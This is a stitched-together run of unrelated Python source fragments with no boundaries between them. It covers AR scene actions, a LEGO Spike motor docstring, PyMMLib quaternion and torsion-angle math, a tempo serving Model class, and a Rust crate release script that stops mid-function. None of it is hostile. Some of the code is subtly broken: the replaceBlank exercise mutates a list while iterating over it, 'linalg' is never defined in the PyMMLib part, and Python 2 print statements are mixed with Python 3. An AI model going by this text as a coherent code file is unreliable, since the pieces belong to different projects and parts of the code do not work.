logger.warning("self.target is not a list. Return") return if self.exercise is None: for animation in self.target: animation.stop() elif self.exercise.running: self.exercise.stop() class HighlightPhysicalObjectsAction(Action): from isar.scene.physicalobjectmodel import PhysicalObject target_types = [PhysicalObject] has_properties = True color = "0, 255, 0" def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. 
Return") return for phys_obj in self.target: phys_obj.highlight = True phys_obj.highlight_color = self.color @classmethod def update_action_properties_frame(cls, scene, select_target_dialog, qt_frame): layout = qt_frame.layout() for i in reversed(range(layout.count())): widget_to_remove = layout.itemAt(i).widget() layout.removeWidget(widget_to_remove) widget_to_remove.setParent(None) label = QLabel() label.setText("Color: ") layout.addWidget(label) line_edit = QLineEdit() line_edit.setText(str(HighlightPhysicalObjectsAction.color)) layout.addWidget(line_edit) set_color_btn = QPushButton() set_color_btn.setText("Set Color") layout.addWidget(set_color_btn) set_color_btn.clicked.connect(lambda: HighlightPhysicalObjectsAction.set_color(line_edit)) @classmethod def set_color(cls, line_edit): value = line_edit.text() color, success = sceneutil.get_color_from_str(value) if color and success: HighlightPhysicalObjectsAction.color = color @classmethod def reset_properties(cls): HighlightPhysicalObjectsAction.color = "0, 255, 0" @classmethod def set_properties(cls, instance): instance.color = HighlightPhysicalObjectsAction.color class UnHighlightPhysicalObjectsAction(Action): from isar.scene.physicalobjectmodel import PhysicalObject target_types = [PhysicalObject] def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return for phys_obj in self.target: phys_obj.highlight = False phys_obj.highlight_color = None class CompositeAction(Action): actions = [] def __init__(self): super().__init__() @classmethod def update_action_properties_frame(cls, scene, select_target_dialog, qt_frame): layout = qt_frame.layout() for i in reversed(range(layout.count())): widget_to_remove = layout.itemAt(i).widget() layout.removeWidget(widget_to_remove) widget_to_remove.setParent(None) select_actions_btn = QPushButton() select_actions_btn.setText("Select Actions ...") layout.addWidget(select_actions_btn) actions_label = QLabel() actions_label.setWordWrap(True) layout.addWidget(actions_label) select_actions_btn.clicked.connect(lambda: CompositeAction.show_select_target_dialog( scene, select_target_dialog, actions_label)) @classmethod def show_select_target_dialog(cls, scene, select_target_dialog, actions_label): CompositeAction.actions = None select_target_dialog.scene = scene select_target_dialog.set_target_types(Action) select_target_dialog.setModal(True) select_target_dialog.exec() if select_target_dialog.result() == QDialog.Accepted: CompositeAction.actions = select_target_dialog.get_targets() text = "" for action in CompositeAction.actions: text += action.name + "\n" actions_label.setText(text) class ParallelCompositeAction(Action): has_target = False has_properties = True def __init__(self): super().__init__() self.actions = [] def run(self): for action in self.actions: t = Thread(name="ParallelCompositeActionThread", target=lambda a: self._action_service.perform_action(a), args=(action, )) t.start() @classmethod def update_action_properties_frame(cls, scene, select_target_dialog, qt_frame): CompositeAction.update_action_properties_frame(scene, select_target_dialog, qt_frame) @classmethod def reset_properties(cls): CompositeAction.actions = [] @classmethod def set_properties(cls, instance): instance.actions = CompositeAction.actions class SequentialCompositeAction(Action): has_target = False has_properties = True def __init__(self): super().__init__() 
self.actions = [] self.time_between_actions = 1 def run(self): t = Thread(name="SequentialCompositeActionThread", target=self.do_run) t.start() def do_run(self): for action in self.actions: self._action_service.perform_action(action) time.sleep(self.time_between_actions) @classmethod def update_action_properties_frame(cls, scene, select_target_dialog, qt_frame): CompositeAction.update_action_properties_frame(scene, select_target_dialog, qt_frame) @classmethod def reset_properties(cls): CompositeAction.actions = [] @classmethod def set_properties(cls, instance): instance.actions = CompositeAction.actions scene_action_types = { ToggleAnnotationVisibilityAction.__name__: ToggleAnnotationVisibilityAction, ShowAnnotationAction.__name__: ShowAnnotationAction, HideAnnotationAction.__name__: HideAnnotationAction, ShowSceneAction.__name__: ShowSceneAction, StartTimerAction.__name__: StartTimerAction, StopTimerAction.__name__: StopTimerAction, ResetTimerAction.__name__: ResetTimerAction, StartAudioAction.__name__: StartAudioAction, StopAudioAction.__name__: StopAudioAction, StartVideoAction.__name__: StartVideoAction, StopVideoAction.__name__: StopVideoAction, StartAnimationAction.__name__: StartAnimationAction, StopAnimationAction.__name__: StopAnimationAction, HighlightPhysicalObjectsAction.__name__: HighlightPhysicalObjectsAction, UnHighlightPhysicalObjectsAction.__name__: UnHighlightPhysicalObjectsAction, ParallelCompositeAction.__name__: ParallelCompositeAction, SequentialCompositeAction.__name__: SequentialCompositeAction } global_action_types = { NextSceneAction.__name__: NextSceneAction, PreviousSceneAction.__name__: PreviousSceneAction, BackSceneAction.__name__: BackSceneAction } # Copyright (c) Microsoft. All rights reserved. # Licensed under the MIT license. print("In train.py") print("As a data scientist, this is where I use my training code.") class Solution: # @param {char[]} string: An array of Char # @param {int} length: The true length of the string # @return {int} The true length of new string def replaceBlank(self, string, length): # Write your code here if string is None: return 0 for i, c in enumerate(string): if c == ' ': string.pop(i) string.insert(i, '0') string.insert(i, '2') string.insert(i, '%') return len(''.join(string)) '''start(steering=0, speed=None) Start both motors simultaneously to move a Driving Base. Steering = "0" makes the Driving Base go straight. Negative numbers make the Driving Base turn left. Positive numbers make the Driving Base turn right. The program flow is not interrupted. This is most likely interrupted by sensor input and a condition. If the value of steering is equal to "-100" or "100," the Driving Base will perform a rotation on itself (i.e., "tank move") at the default speed of each motor. If the value of "steering" is outside of the allowed range, the value will be set to "-100" or "100," depending on whether the value is positive or negative. If speed is outside of the allowed range, the value will be set to "-100" or "100," depending on whether the value is positive or negative. If the speed is negative, the Driving Base will move backward instead of forward. Likewise, if the "amount" is negative, the Driving Base will move backward instead of forward. If both the speed and the "amount" are negative, the Driving Base will move forward. Parameters steering The direction and quantity to steer the Driving Base. 
Type:integer (a positive or negative whole number, including 0) Values:-100 to 100 Default:0 speed The speed at which the Driving Base will move while performing a curve. Type:integer (a positive or negative whole number, including 0) Values:-100 to 100% Default:If no value is specified, it will use the default speed that’s been set by set_default_speed(). Errors TypeError steering or speed is not an integer. RuntimeError One or both of the motors has been disconnected or the motors could not be paired. Example ''' from spike import MotorPair import time motor_pair = MotorPair('B', 'A') motor_pair.start() time.sleep_ms(2000) # wait for something motor_pair.stop() ## Copyright 2002-2010 by PyMMLib Development Group (see AUTHORS file) ## This code is part of the PyMMLib distribution and governed by ## its license. Please see the LICENSE file that should have been ## included as part of this package. """Mathematical operations performed on mmLib.Strcuture.Atom objects. """ import math import numpy import Constants ## ## Linear Algebra ## def length(u): """Calculates the length of u. """ return math.sqrt(numpy.dot(u, u)) def normalize(u): """Returns the normalized vector along u. """ return u/math.sqrt(numpy.dot(u, u)) def cross(u, v): """Cross product of u and v: Cross[u,v] = {-u3 v2 + u2 v3, u3 v1 - u1 v3, -u2 v1 + u1 v2} """ return numpy.array([ u[1]*v[2] - u[2]*v[1], u[2]*v[0] - u[0]*v[2], u[0]*v[1] - u[1]*v[0] ], float) ## ## Internal Linear Algebra (without using numpy) ## def internal_cross(u, v): """Returns the cross product of two vectors. Should be identical to the output of numpy.cross(u, v). """ return(u[1]*v[2] - v[1]*u[2], u[2]*v[0] - v[2]*u[0], u[0]*v[1] - v[0]*u[1]) def internal_dot(u, v): """Returns the dot product of two vectors. Should be identical to the output of numpy.dot(u, v). """ return u[0]*v[0] + u[1]*v[1] + u[2]*v[2] def internal_inv3x3(u): """Returns the inverse of a 3x3 matrix. Should be identical to the output of numpy.linalg.inv(u). """ inv = [[0,0,0],[0,0,0],[0,0,0]] c = [] c.append(internal_cross(u[1], u[2])) ## c[0] c.append(internal_cross(u[2], u[0])) ## c[1] c.append(internal_cross(u[0], u[1])) ## c[2] d = internal_dot(u[0], c[0]) if(abs(d) < 1e-30): return 0.0, inv for i in range(0,3): for j in range(0,3): inv[i][j] = float(c[j][i]) / float(d) return d, inv ## ## Rotation/Displacement ## def rmatrix(alpha, beta, gamma): """Return a rotation matrix based on the Euler angles alpha, beta, and gamma in radians. """ cosA = math.cos(alpha) cosB = math.cos(beta) cosG = math.cos(gamma) sinA = math.sin(alpha) sinB = math.sin(beta) sinG = math.sin(gamma) R = numpy.array( [[cosB*cosG, cosG*sinA*sinB-cosA*sinG, cosA*cosG*sinB+sinA*sinG], [cosB*sinG, cosA*cosG+sinA*sinB*sinG, cosA*sinB*sinG-cosG*sinA ], [-sinB, cosB*sinA, cosA*cosB ]], float) assert numpy.allclose(numpy.linalg.det(R), 1.0) return R def rmatrixu(u, theta): """Return a rotation matrix caused by a right hand rotation of theta radians around vector u. 
""" if numpy.allclose(theta, 0.0) or numpy.allclose(numpy.dot(u,u), 0.0): return numpy.identity(3, float) x, y, z = normalize(u) sa = math.sin(theta) ca = math.cos(theta) R = numpy.array( [[1.0+(1.0-ca)*(x*x-1.0), -z*sa+(1.0-ca)*x*y, y*sa+(1.0-ca)*x*z], [z*sa+(1.0-ca)*x*y, 1.0+(1.0-ca)*(y*y-1.0), -x*sa+(1.0-ca)*y*z], [-y*sa+(1.0-ca)*x*z, x*sa+(1.0-ca)*y*z, 1.0+(1.0-ca)*(z*z-1.0)]], float) try: assert numpy.allclose(numpy.linalg.det(R), 1.0) except AssertionError: print "rmatrixu(%s, %f) determinant(R)=%f" % ( u, theta, numpy.linalg.det(R)) raise return R def dmatrix(alpha, beta, gamma): """Returns the displacement matrix based on rotation about Euler angles alpha, beta, and gamma. """ return rmatrix(alpha, beta, gamma) - numpy.identity(3, float) def dmatrixu(u, theta): """Return a displacement matrix caused by a right hand rotation of theta radians around vector u. """ return rmatrixu(u, theta) - numpy.identity(3, float) def rmatrixz(vec): """Return a rotation matrix which transforms the coordinate system such that the vector vec is aligned along the z axis. """ u, v, w = normalize(vec) d = math.sqrt(u*u + v*v) if d != 0.0: Rxz = numpy.array([ [ u/d, v/d, 0.0 ], [ -v/d, u/d, 0.0 ], [ 0.0, 0.0, 1.0 ] ], float) else: Rxz = numpy.identity(3, float) Rxz2z = numpy.array([ [ w, 0.0, -d], [ 0.0, 1.0, 0.0], [ d, 0.0, w] ], float) R = numpy.dot(Rxz2z, Rxz) try: assert numpy.allclose(numpy.linalg.det(R), 1.0) except AssertionError: print "rmatrixz(%s) determinant(R)=%f" % (vec, numpy.linalg.det(R)) raise return R ## ## Quaternions ## def rquaternionu(u, theta): """Returns a quaternion representing the right handed rotation of theta radians about vector u. Quaternions are typed as Numeric Python numpy.arrays of length 4. """ u = normalize(u) half_sin_theta = math.sin(theta / 2.0) x = u[0] * half_sin_theta y = u[1] * half_sin_theta z = u[2] * half_sin_theta w = math.cos(theta / 2.0) ## create quaternion q = numpy.array((x, y, z, w), float) assert numpy.allclose(math.sqrt(numpy.dot(q,q)), 1.0) return q def addquaternion(q1, q2): """Adds quaternions q1 and q2. Quaternions are typed as Numeric Python numpy.arrays of length 4. """ assert numpy.allclose(math.sqrt(numpy.dot(q1,q1)), 1.0) assert numpy.allclose(math.sqrt(numpy.dot(q2,q2)), 1.0) x1, y1, z1, w1 = q1 x2, y2, z2, w2 = q2 x = w1*x2 + x1*w2 + y1*z2 - z1*y2 y = w1*y2 + y1*w2 + z1*x2 - x1*z2 z = w1*z2 + z1*w2 + x1*y2 - y1*x2 w = w1*w2 - x1*x2 - y1*y2 - z1*z2 q = numpy.array((x, y, z, w), float) ## normalize quaternion q = q / math.sqrt(numpy.dot(q,q)) assert numpy.allclose(math.sqrt(numpy.dot(q,q)), 1.0) return q def rmatrixquaternion(q): """Create a rotation matrix from q quaternion rotation. Quaternions are typed as Numeric Python numpy.arrays of length 4. """ assert numpy.allclose(math.sqrt(numpy.dot(q,q)), 1.0) x, y, z, w = q xx = x*x xy = x*y xz = x*z xw = x*w yy = y*y yz = y*z yw = y*w zz = z*z zw = z*w r00 = 1.0 - 2.0 * (yy + zz) r01 = 2.0 * (xy - zw) r02 = 2.0 * (xz + yw) r10 = 2.0 * (xy + zw) r11 = 1.0 - 2.0 * (xx + zz) r12 = 2.0 * (yz - xw) r20 = 2.0 * (xz - yw) r21 = 2.0 * (yz + xw) r22 = 1.0 - 2.0 * (xx + yy) R = numpy.array([[r00, r01, r02], [r10, r11, r12], [r20, r21, r22]], float) assert numpy.allclose(numpy.linalg.det(R), 1.0) return R def quaternionrmatrix(R): """Return a quaternion calculated from the argument rotation matrix R. 
""" assert numpy.allclose(numpy.linalg.det(R), 1.0) t = numpy.trace(R) + 1.0 if t>1e-5: w = math.sqrt(1.0 + numpy.trace(R)) / 2.0 w4 = 4.0 * w x = (R[2,1] - R[1,2]) / w4 y = (R[0,2] - R[2,0]) / w4 z = (R[1,0] - R[0,1]) / w4 else: if R[0,0]>R[1,1] and R[0,0]>R[2,2]: S = math.sqrt(1.0 + R[0,0] - R[1,1] - R[2,2]) * 2.0 x = 0.25 * S y = (R[0,1] + R[1,0]) / S z = (R[0,2] + R[2,0]) / S w = (R[1,2] - R[2,1]) / S elif R[1,1]>R[2,2]: S = math.sqrt(1.0 + R[1,1] - R[0,0] - R[2,2]) * 2.0 x = (R[0,1] + R[1,0]) / S y = 0.25 * S z = (R[1,2] + R[2,1]) / S w = (R[0,2] - R[2,0]) / S else: S = math.sqrt(1.0 + R[2,2] - R[0,0] - R[1,1]) * 2 x = (R[0,2] + R[2,0]) / S y = (R[1,2] + R[2,1]) / S z = 0.25 * S w = (R[0,1] - R[1,0] ) / S q = numpy.array((x, y, z, w), float) assert numpy.allclose(math.sqrt(numpy.dot(q,q)), 1.0) return q ## ## Bond Angles ## def calc_distance(a1, a2): """Returns the distance between two argument atoms. """ if a1 == None or a2 == None: return None return length(a1.position - a2.position) def calc_angle(a1, a2, a3): """Return the angle between the three argument atoms. """ if a1 == None or a2 == None or a3 == None: return None a21 = a1.position - a2.position a21 = a21 / (length(a21)) a23 = a3.position - a2.position a23 = a23 / (length(a23)) return math.acos(numpy.dot(a21, a23)) def calc_torsion_angle_old(a1, a2, a3, a4): """Calculates the torsion angle between the four argument atoms. Note: This "old" subroutine doesn't appear to do what it claims. Please see the 'new' calc_torsion_angle() function below. """ if a1 == None or a2 == None or a3 == None or a4 == None: return None a12 = a2.position - a1.position a23 = a3.position - a2.position a34 = a4.position - a3.position n12 = cross(a12, a23) n34 = cross(a23, a34) n12 = n12 / length(n12) n34 = n34 / length(n34) cross_n12_n34 = cross(n12, n34) direction = cross_n12_n34 * a23 scalar_product = numpy.dot(n12, n34) if scalar_product > 1.0: scalar_product = 1.0 if scalar_product < -1.0: scalar_product = -1.0 angle = math.acos(scalar_product) ## E.g, direction = [0.70710678, 0.0, 0.0] if direction.all() < 0.0: ## True if _all_ elements of 'direction' are true (or if 'direction' ## is empty) angle = -angle return angle def calc_torsion_angle(a1, a2, a3, a4, sqrt=math.sqrt, acos=math.acos): """Calculates the torsion angle between the four argument atoms. """ if a1 == None or a2 == None or a3 == None or a4 == None: return None v12x = a1.position[0] - a2.position[0] v12y = a1.position[1] - a2.position[1] v12z = a1.position[2] - a2.position[2] v32x = a3.position[0] - a2.position[0] v32y = a3.position[1] - a2.position[1] v32z = a3.position[2] - a2.position[2] v43x = a4.position[0] - a3.position[0] v43y = a4.position[1] - a3.position[1] v43z = a4.position[2] - a3.position[2] vn13x = v12y*v32z - v12z*v32y vn13y = v12z*v32x - v12x*v32z vn13z = v12x*v32y - v12y*v32x vn24x = v32z*v43y - v32y*v43z vn24y = v32x*v43z - v32z*v43x vn24z = v32y*v43x - v32x*v43y v12 = vn13x*vn24x + vn13y*vn24y + vn13z*vn24z v11 = vn13x**2 + vn13y**2 + vn13z**2 v22 = vn24x**2 + vn24y**2 + vn24z**2 angle = v12/sqrt(v11*v22) if angle >= 1.0: return 0.0 elif angle <= -1.0: return -180.0 else: angle = acos(angle) * Constants.RAD2DEG vtmp = vn13x * (vn24y*v32z - vn24z*v32y) + \ vn13y * (vn24z*v32x - vn24x*v32z) + \ vn13z * (vn24x*v32y - vn24y*v32x) < 0.0 if vtmp: return -angle else: return angle ## ## Atomic ADPs ## def calc_CCuij(U, V): """Calculate the correlation coefficient for anisotropic ADP tensors U and V. 
""" ## FIXME: Check for non-positive Uij's, 2009-08-19 invU = linalg.inverse(U) invV = linalg.inverse(V) #invU = internal_inv3x3(U) #invV = internal_inv3x3(V) det_invU = numpy.linalg.det(invU) det_invV = numpy.linalg.det(invV) return ( math.sqrt(math.sqrt(det_invU * det_invV)) / math.sqrt((1.0/8.0) * numpy.linalg.det(invU + invV)) ) def calc_Suij(U, V): """Calculate the similarity of anisotropic ADP tensors U and V. """ ## FIXME: Check for non-positive Uij's, 2009-08-19 eqU = numpy.trace(U) / 3.0 eqV = numpy.trace(V) / 3.0 isoU = eqU * numpy.identity(3, float) isoV = eqV * numpy.identity(3, float) return ( calc_CCuij(U, (eqU/eqV)*V) / (calc_CCuij(U, isoU) * calc_CCuij(V, isoV)) ) def calc_DP2uij(U, V): """Calculate the square of the volumetric difference in the probability density function of anisotropic ADP tensors U and V. """ invU = linalg.inverse(U) invV = linalg.inverse(V) det_invU = numpy.linalg.det(invU) det_invV = numpy.linalg.det(invV) Pu2 = math.sqrt( det_invU / (64.0 * Constants.PI3) ) Pv2 = math.sqrt( det_invV / (64.0 * Constants.PI3) ) Puv = math.sqrt( (det_invU * det_invV) / (8.0*Constants.PI3 * numpy.linalg.det(invU + invV))) dP2 = Pu2 + Pv2 - (2.0 * Puv) return dP2 def calc_anisotropy(U): """Calculates the anisotropy of a atomic ADP tensor U. Anisotropy is defined as the smallest eigenvalue of U divided by the largest eigenvalue of U. """ evals = linalg.eigenvalues(U) return min(evals) / max(evals) def diff_trace_UV(U, V): """Calculates the trace difference of anisotropic ADP tensors U and V. """ return abs((numpy.trace(U) - numpy.trace(V))/ 3.0) def sum_square_diff(U, V): """Calculates the sum of the differences of anisotropic ADP tensors U and V squared. """ return abs(numpy.sum(numpy.subtract(U,V)**2)) def calc_rosenfeld(a, b, d, U, V): n = numpy.array([(a[0] - b[0])/d, (a[1] - b[1])/d, (a[2] - b[2])/d]) #Un = numpy.dot(numpy.dot(n, U), numpy.transpose(n)) #Vn = numpy.dot(numpy.dot(n, V), numpy.transpose(n)) Un = internal_dot(internal_dot(n, U), numpy.transpose(n)) Vn = internal_dot(internal_dot(n, V), numpy.transpose(n)) return abs(Un - Vn) ## ## Calculations on groups of atoms ## def calc_atom_centroid(atom_iter): """Calculates the centroid of all contained Atom instances and returns a Vector to the centroid. """ num = 0 centroid = numpy.zeros(3, float) for atm in atom_iter: if atm.position != None: centroid += atm.position num += 1 return centroid / num def calc_atom_mean_temp_factor(atom_iter): """Calculates the average temperature factor of all contained Atom instances and returns the average temperature factor. """ num_tf = 0 adv_tf = 0.0 for atm in atom_iter: if atm.temp_factor != None: adv_tf += atm.temp_factor num_tf += 1 return adv_tf / num_tf def calc_inertia_tensor(atom_iter, origin): """Calculate a moment-of-inertia tensor at the given origin assuming all atoms have the same mass. 
""" I = numpy.zeros((3,3), float) for atm in atom_iter: x = atm.position - origin I[0,0] += x[1]**2 + x[2]**2 I[1,1] += x[0]**2 + x[2]**2 I[2,2] += x[0]**2 + x[1]**2 I[0,1] += - x[0]*x[1] I[1,0] += - x[0]*x[1] I[0,2] += - x[0]*x[2] I[2,0] += - x[0]*x[2] I[1,2] += - x[1]*x[2] I[2,1] += - x[1]*x[2] evals, evecs = linalg.eigenvectors(I) ## order the tensor such that the largest ## principal component is along the z-axis, and ## the second largest is along the y-axis if evals[0] >= evals[1] and evals[0] >= evals[2]: if evals[1] >= evals[2]: R = numpy.array((evecs[2], evecs[1], evecs[0]), float) else: R = numpy.array((evecs[1], evecs[2], evecs[0]), float) elif evals[1] >= evals[0] and evals[1] >= evals[2]: if evals[0] >= evals[2]: R = numpy.array((evecs[2], evecs[0], evecs[1]), float) else: R = numpy.array((evecs[0], evecs[2], evecs[1]), float) elif evals[2] >= evals[0] and evals[2] >= evals[1]: if evals[0] >= evals[1]: R = numpy.array((evecs[1], evecs[0], evecs[2]), float) else: R = numpy.array((evecs[0], evecs[1], evecs[2]), float) ## make sure the tensor is right-handed if numpy.allclose(numpy.linalg.det(R), -1.0): I = numpy.identity(3, float) I[0,0] = -1.0 R = numpy.dot(I, R) assert numpy.allclose(numpy.linalg.det(R), 1.0) return R # Copyright (C) 2018-2019 SignalFx, Inc. All rights reserved. from .tracing import monkeypatch_requests, SessionTracing # noqa tempo/serve/model.py from typing import Any, Callable from tempo.protocols.v2 import V2Protocol from tempo.serve.base import BaseModel from tempo.serve.metadata import BaseRuntimeOptionsType, DockerOptions, ModelFramework from tempo.serve.protocol import Protocol from tempo.serve.types import ModelDataType class Model(BaseModel): def __init__( self, name: str, protocol: Protocol = V2Protocol(), local_folder: str = None, uri: str = None, platform: ModelFramework = None, inputs: ModelDataType = None, outputs: ModelDataType = None, model_func: Callable[..., Any] = None, conda_env: str = None, runtime_options: BaseRuntimeOptionsType = DockerOptions(), description: str = "", ): """ Parameters ---------- name Name of the pipeline. Needs to be Kubernetes compliant. protocol :class:`tempo.serve.protocol.Protocol`. Defaults to KFserving V2. local_folder Location of local artifacts. uri Location of remote artifacts. platform The :class:`tempo.serve.metadata.ModelFramework` inputs The input types. outputs The output types. conda_env The conda environment name to use. If not specified will look for conda.yaml in local_folder or generate from current running environment. runtime_options The runtime options. Can be left empty and set when creating a runtime. description The description of the model """ super().__init__( name, # TODO: Should we unify names? 
user_func=model_func, local_folder=local_folder, uri=uri, platform=platform, inputs=inputs, outputs=outputs, conda_env=conda_env, protocol=protocol, runtime_options=runtime_options, description=description, ) #!/bin/python3 from contextlib import contextmanager # pip3 install datetime import datetime import errno import time import shutil import sys import tempfile from os import listdir, sep as os_sep from os.path import isdir, isfile, join # local imports import consts from args import Arguments, UpdateType from github import Github from globals import CRATES_VERSION, PULL_REQUESTS, SEARCH_INDEX, SEARCH_INDEX_BEFORE from globals import SEARCH_INDEX_AFTER from my_toml import TomlHandler from utils import add_to_commit, clone_repo, exec_command_and_print_error, get_features from utils import checkout_target_branch, get_file_content, write_error, write_into_file from utils import commit, commit_and_push, create_pull_request, push, revert_changes, write_msg from utils import create_tag_and_push, get_last_commit_date, merging_branches, publish_crate from utils import check_rustdoc_is_nightly, check_if_up_to_date @contextmanager def temporary_directory(): name = tempfile.mkdtemp() try: yield name finally: try: shutil.rmtree(name) except OSError as err: # if the directory has already been removed, no need to raise an error if err.errno != errno.ENOENT: raise # Doesn't handle version number containing something else than numbers and '.'! def update_version(version, update_type, section_name, place_type="section"): version_split = version.replace('"', '').split('.') if len(version_split) != 3: # houston, we've got a problem! write_error('Invalid version in {} "{}": {}'.format(place_type, section_name, version)) return None if update_type == UpdateType.MINOR: version_split[update_type] = str(int(version_split[update_type]) + 1) elif update_type == UpdateType.MEDIUM: version_split[update_type] = str(int(version_split[update_type]) + 1) version_split[UpdateType.MINOR] = '0' else: version_split[update_type] = str(int(version_split[update_type]) + 1) version_split[UpdateType.MEDIUM] = '0' version_split[UpdateType.MINOR] = '0' return '"{}"'.format('.'.join(version_split)) def check_and_update_version(entry, update_type, dependency_name, versions_update): if entry.startswith('"') or entry.startswith("'"): return update_version(entry, update_type, dependency_name, place_type="dependency") # get version and update it entry = [e.strip() for e in entry.split(',')] dic = {} for part in entry: if part.startswith('{'): part = part[1:].strip() if part.endswith('}'): part = part[:-1].strip() part = [p.strip() for p in part.split('=')] dic[part[0]] = part[1] if part[0] == 'version': old_version = part[1] new_version = update_version(old_version, update_type, dependency_name, place_type="dependency") if new_version is None: return None # Mostly for debugging, not really useful otherwise... 
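# Each appended entry has the shape {'dependency_name': ..., 'old_version': ..., 'new_version': ...},
# matching the dicts collected in update_repo_version() below; it exists only so the caller can
# print a "name: old_version => new_version" summary afterwards (or is discarded when an empty
# throw-away list is passed in).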
versions_update.append({'dependency_name': dependency_name, 'old_version': old_version, 'new_version': new_version}) dic[part[0]] = '"{}"'.format(new_version) return '{{{}}}'.format(', '.join(['{} = {}'.format(entry, dic[entry]) for entry in dic])) def find_crate(crate_name): for entry in consts.CRATE_LIST: if entry['crate'] == crate_name: return True return False def update_crate_version(repo_name, crate_name, crate_dir_path, temp_dir, specified_crate): file_path = join(join(join(temp_dir, repo_name), crate_dir_path), "Cargo.toml") output = file_path.replace(temp_dir, "") if output.startswith('/'): output = output[1:] write_msg('=> Updating crate versions for {}'.format(file_path)) content = get_file_content(file_path) if content is None: return False toml = TomlHandler(content) for section in toml.sections: if section.name == 'package': section.set('version', CRATES_VERSION[crate_name]) elif specified_crate is not None: continue elif section.name.startswith('dependencies.') and find_crate(section.name[13:]): if specified_crate is None and section.name[13:] not in CRATES_VERSION: input('"{}" dependency not found in versions for crate "{}"...' .format(section.name[13:], crate_name)) continue section.set('version', CRATES_VERSION[section.name[13:]]) elif section.name == 'dependencies': for entry in section.entries: if find_crate(entry['key']): section.set(entry['key'], CRATES_VERSION[entry['key']]) result = write_into_file(file_path, str(toml)) write_msg('=> {}: {}'.format(output.split(os_sep)[-2], 'Failure' if result is False else 'Success')) return result def update_repo_version(repo_name, crate_name, crate_dir_path, temp_dir, update_type, no_update): # pylint: disable=too-many-branches,too-many-locals file_path = join(join(join(temp_dir, repo_name), crate_dir_path), "Cargo.toml") output = file_path.replace(temp_dir, "") if output.startswith('/'): output = output[1:] write_msg('=> Updating versions for {}'.format(file_path)) content = get_file_content(file_path) if content is None: return False toml = TomlHandler(content) versions_update = [] for section in toml.sections: if (section.name == 'package' or (section.name.startswith('dependencies.') and find_crate(section.name[13:]))): version = section.get('version', None) if version is None: continue new_version = None if no_update is False: new_version = update_version(version, update_type, section.name) else: new_version = version if new_version is None: return False # Print the status directly if it's the crate's version. if section.name == 'package': write_msg('\t{}: {} => {}'.format(output.split(os_sep)[-2], version, new_version)) CRATES_VERSION[crate_name] = new_version else: # Otherwise add it to the list to print later. versions_update.append({'dependency_name': section.name[13:], 'old_version': version, 'new_version': new_version}) section.set('version', new_version) elif section.name == 'dependencies': for entry in section.entries: if find_crate(entry): new_version = check_and_update_version(section.entries[entry], update_type, entry, []) section.set(entry, new_version) for update in versions_update: write_msg('\t{}: {} => {}'.format(update['dependency_name'], update['old_version'], update['new_version'])) out = str(toml) if not out.endswith("\n"): out += '\n' result = True if no_update is False: # We only write into the file if we're not just getting the crates version. 
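# no_update is True when the script runs in badges-only or tags-only mode (see the call in
# update_crates_versions() below): in that case this function only records the current versions
# in CRATES_VERSION and must not rewrite Cargo.toml, which is why the write below is skipped.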
result = write_into_file(file_path, out) write_msg('=> {}: {}'.format(output.split(os_sep)[-2], 'Failure' if result is False else 'Success')) return result def update_badges(repo_name, temp_dir, specified_crate): path = join(join(temp_dir, repo_name), "_data/crates.json") content = get_file_content(path) current = None out = [] for line in content.split("\n"): if line.strip().startswith('"name": "'): current = line.split('"name": "')[-1].replace('",', '') if specified_crate is not None and current != specified_crate: current = None elif line.strip().startswith('"max_version": "') and current is not None: version = line.split('"max_version": "')[-1].replace('"', '').replace(',', '') out.append(line.replace('": "{}"'.format(version), '": {}'.format(CRATES_VERSION[current])) + '\n') current = None continue out.append(line + '\n') return write_into_file(path, ''.join(out).replace('\n\n', '\n')) def cleanup_doc_repo(temp_dir): path = join(temp_dir, consts.DOC_REPO) dirs = ' '.join(['"{}"'.format(join(path, f)) for f in listdir(path) if isdir(join(path, f)) and f.startswith('.') is False]) command = ['bash', '-c', 'cd {} && rm -rf {}'.format(path, dirs)] if not exec_command_and_print_error(command): input("Couldn't clean up docs! Try to fix it and then press ENTER to continue...") def build_docs(repo_name, temp_dir, extra_path, crate_name): # pylint: disable=too-many-locals path = join(join(temp_dir, repo_name), extra_path) features = get_features(join(path, 'Cargo.toml')) # We can't add "--no-deps" argument to cargo doc, otherwise we lose links to items of # other crates... # # Also, we run "cargo update" in case the lgpl-docs repository has been updated (so we get the # last version). command = ['bash', '-c', ('cd {} && cargo update && cargo rustdoc --no-default-features ' '--features "{}"').format(path, features)] if not exec_command_and_print_error(command): input("Couldn't generate docs! Try to fix it and then press ENTER to continue...") doc_folder = join(path, 'target/doc') try: file_list = ' '.join(['"{}"'.format(f) for f in listdir(doc_folder) if isfile(join(doc_folder, f))]) except Exception as err: write_error('Error occured in build docs: {}'.format(err)) input("It seems like the \"{}\" folder doesn't exist. Try to fix it then press ENTER..." .format(doc_folder)) # Copy documentation files command = ['bash', '-c', 'cd {} && cp -r "{}" {} "{}"' .format(doc_folder, crate_name.replace('-', '_'), file_list, join(temp_dir, consts.DOC_REPO))] if not exec_command_and_print_error(command): input("Couldn't copy docs! Try to fix it and then press ENTER to continue...") # Copy source files destination = "{}/src".format(join(temp_dir, consts.DOC_REPO)) command = ['bash', '-c', 'cd {0} && mkdir -p "{1}" && cp -r "src/{2}" "{1}/"' .format(doc_folder, destination, crate_name.replace('-', '_'))] if not exec_command_and_print_error(command): input("Couldn't copy doc source files! Try to fix it and then press ENTER to continue...") search_index = join(path, 'target/doc/search-index.js') lines = get_file_content(search_index).split('\n') before = True fill_extras = len(SEARCH_INDEX_BEFORE) == 0 found = False for line in lines: if line.startswith('searchIndex['): before = False # We need to be careful in here if we're in a sys repository (which should never be the # case!). 
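# rustdoc's search-index.js holds one `searchIndex["crate_name"] = ...;` line per documented
# crate (layout assumed from the string checks used here): the loop keeps only the line for the
# crate being built and stashes everything before/after that block in SEARCH_INDEX_BEFORE /
# SEARCH_INDEX_AFTER so end_docs_build() can stitch a single combined index back together.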
